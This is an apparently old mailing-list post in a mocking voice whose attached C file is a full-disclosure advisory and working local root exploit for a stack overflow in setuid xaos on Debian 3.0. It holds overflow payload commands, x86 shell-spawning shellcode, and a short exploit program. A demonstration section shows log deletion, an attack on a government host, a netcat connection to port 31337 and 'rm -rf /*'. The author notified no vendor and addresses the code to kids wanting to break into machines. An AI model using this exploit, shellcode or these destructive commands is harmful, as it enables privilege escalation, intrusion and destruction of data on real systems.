|
------=_Part_3705_33550467.1054852043280 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit bazarr! ------=_Part_3705_33550467.1054852043280 Content-Type: text/x-csrc; name=bazarr-episode-4.c Content-Transfer-Encoding: quoted-printable Content-Disposition: ATTACHMENT; filename=bazarr-episode-4.c /* xaos <=3D 3.0-23 ? 0day local root xploit on debian 3.0 whoody = */ /* by: bazarr = */ /* bazarr@ziplip.com <mailto:bazarr@ziplip.com> = */ /* =09bazarr episode #4=09=09=09=09=09=09 *=20 =09=09=09=09=09=09=09=09=09=09 *hendy* i dont build nests for da winter, cause i dont have no time for bui= lding nests dis is da advisory and xploit at da same time for a local root hole in debi= an 3.0.=20 if dave censor dis he out of his mind! dis my second local root xploit in a= week! when bugtraq be heading down south to county jail quick wid all da cross si= te scripting bugs and advisorys for hoolio's ftpd servers (WHO DA HELL IS HOOLIO). lets be re= al about dis advisorys for non popular software are a dime a dozen. i da first young boy= to come around=20 wid real advisorys in many a months. so please gimmie small break.=20 i release more advisorys den combined times dvdfairy has DoS'd phrack.ru dats alot! --- You have been kicked from #openbsd by Dianora (I have been coding before you were even a glint in your fathers eye. go aw= ay) dianora when i finish "da design and implementation of da 4.4bsd operating = system" (A BOOK) i be back to challenge you on bsd kernel , den you have no choice but to le= t me stay and give me +v in #openbsd. thank you. (she kicked young 16 year old boy out of channel for xposing rem= ote hole in default install!)=20 ok lets take a look at the vendor info for xaos: DESCRIPTION XaoS is a protable real-time interactive fractal zoomer/morpher. U= NIX version works under X11, SVGA and text terminals. If you don't knwo wh= at fractal is or you want to know more about XaoS features you should see animated tutorial. = Run XaoS and press 'H' twice. It is much more fun than reading of boring = manual page :) and it supports foregin languages. You might also read xaos.info file for = some advanced stuff (like how to write animations and tutorials manually, p= ort or extend XaoS, algo=AD rithms used etc.) first thing dat i spot is spelling mistake please patch 'knwo' into 'no' as= ap. so we know dat xaos is a program which you zoom around in when you get real= stoned(seriously).=20 lets get to da local root hole in xaos.=20 lets take a look at my terminal session wid xaos:=20 c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> ls -al xaos ls: xaos: No such file or directory c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #well it aint here so lemme get back to da irc=20 c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #wait a second! i got an idea c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> ls -al /usr/bin/xaos=20 -rwsr-xr-x 1 root root 379324 Apr 3 2001 /usr/bin/xaos c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #suid root?! dat mean if it xploited it will resul= t in uid =3D 0=20 c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #what will i do now? now what i be doin is dis , bare wid me here fellow security researches (lc= amtuf you able to keep up wid dis?)=20 lets keep going into dis adventure, lets check if you be vulnerable c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #ok now we be checking if dis xaos is vulnerable t= o 0day bug which i have discovered=20 c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> /usr/bin/xaos -language `perl -e 'print "A"x2049'` ^C c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #ok im not vulnerable i guess c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #w8 i have an idea! c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> /usr/bin/xaos -language `perl -e 'print "A"x20049'= ` Segmentation fault c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> #aww crap i be vulnerable , what now? after auditing for many a days and many a nights to find dis bug i am still= weary from all of it.=20 so lemme try and keep on going through dis adventure wid xaos, lets try and= xploit it dis time.=20 c00l@debian:~/code/dump% <mailto:c00l@debian:~/code/dump%> ./set #dis put shellcode in enviroment with many a= 0x90 around it=20 [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809= 6'` -display A Segmentation fault [c00l:dump]$ #its not xploitable i guess=20 [c00l:dump]$ #w8 i got an idea [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809= 6'` -display AA Segmentation fault [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809= 6'` -display AAA Segmentation fault [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x809= 6'` -display AAAA sh-2.05a# id ; uname -a uid=3D1001(c00l) gid=3D1001(c00l) euid=3D0(root) groups=3D1001(c00l) Linux debian 2.4.18 #2 SMP Tue Nov 5 21:10:53 EST 2002 i686 unknown sh-2.05a# # I DID IT=20 sh-2.05a# exit =20 exit [c00l:dump]$ #be ethical and just run uname ; id and exit , thanks! woa dis be going too fast for some security researchers let me slow down an= d xplain dis.=20 xaos be doing somthing like dis wid its -language argument=20 ++++++++ char hoolio[4096]; //big as to not allow stack overflow strcpy(hoolio,argv[i]) //secure ++++++++ but it is NOT secure , a attacker is able to overflow 'hoolio' wid his own = data! den he overwrite da saved return address on da stack with his own and den h= e execute a shell.=20 ------------- ENDING=20 xaos is vulnerable to a stack buffer overflow which be yeilding root privle= ges on debian 3.0 (w00dy)=20 -------------=09 PATCH see many a people dont understand dis issue, i am young highschool boy=20 doing many a bleeding edge freelance security work for free , it not my job= to provide patch=20 and pamper you. but if you really dont want to get hacked with many a 0day = xploits just dont go online and dont make fun of caddis cuz he be xploiting your ftpd in record time to= rm you(seriously man).=20 -------------=09 VENDORS NOTIFYED none -------------=09 VENDORS VULNERABLE debain 3.0 & unstable on default install!!! FreeBSD x.x ports!=20 OpenBSD x.x ports! NetBSD x.x ports!!!=20 anyone who installed xaos! ------------- XPLOIT=20 as i promised , dis is da xploit!. if my code looks hoodly poodly its cuz= =20 i have trouble programming after last nights crystal meth ride.=20 demonstation: [pan@****.kr]$ cc bazarr-episode-4.c [pan@****.kr]$ ./a.out aaaa [*] bazarr :) sh-2.05a# id uid=3D1003(pan) gid=3D1003(pan) euid=3D0(root) groups=3D1003(pan) sh-2.05a# rm -rf /var/log=20 sh-2.05a# cc b.c=20 sh-2.05a# ./a.out -t 39 -h ****.xxtax.gov.cn -s 90 -b=20 .... ..... .... .... .... .... done.=20 sh-2.05a# nc ****.xxtax.gov.cn 31337 sh: nc: command not found sh-2.05a# rm -rf /* & exit just compile and run!!! so user friendly its not even funny! the 'a's are stack padding for da xaos , try 1-4 'a's woa hey i just made a fool of myself! i dident need any stack padding there= . dis C-code is very complex , do not attempt to modify it.=20 it is very user friendly though for da following groups: 1. 22 year old php programming cs students 2. younger kids looking to hack boxes! (I LOVE DIS GROUP) 3. professional security researches to make money off highschool boy by usi= ng dis xploit on der clients and charging dem for it 4. elite lurking blackhat laughing at my codez! (I CANT SAY I LIKE DIS GROU= P ALL DAT MUCH)=20 AND NOW THE WORLDS FIRST 4 LINE ROOT XPLOIT PROGRAMMED IN C BY BAZARR */ char c[] =3D "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x0b\x99\x52\x68\= x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; int main(int cc,char **a) {char x[256];char b[72000];memset(b,0x99,sizeof(b= ));;;memcpy(b+71968,c,strlen(c));/**/;;b[sizeof(b)]=3D0;;setenv("C",b,1); if (!a[1]){printf("[*] bazarr :(\n");exit(1);};/**/;;sprintf(x,"/usr/bin/xa= os -language `perl -e 'print=20 \"\x45\xfe\xfe\xbf\"x8096'` -display %s",a[1]);;;printf("[*] bazarr :)\n");= system(x);} /*=20 ------------- ADVANCE WARNING=20 double free() bug in popular suid root application installed by default on = debian 3.0 comming soon! remote xploit for debian application comming soon! and so many more i cannot even list dem all(SERIOUSLY).=20 16 year old boy release more bugs in few weeks den your whole crew does in = da last 5 years! i think most of you be a little bitter about dat and dats why you some of y= ou be anti bazarr.=20 your company should stick to hoolio's ftpd server.=20 ------------- GREETS sir hackalot - you cool man! you like the 2pac of hacking. what ever happen= d to you and PHAZE? it been awhile! ------------- BYE bye bye guys i gotta go feed the dog and work on math homework. bye. -bazarr */ ------=_Part_3705_33550467.1054852043280--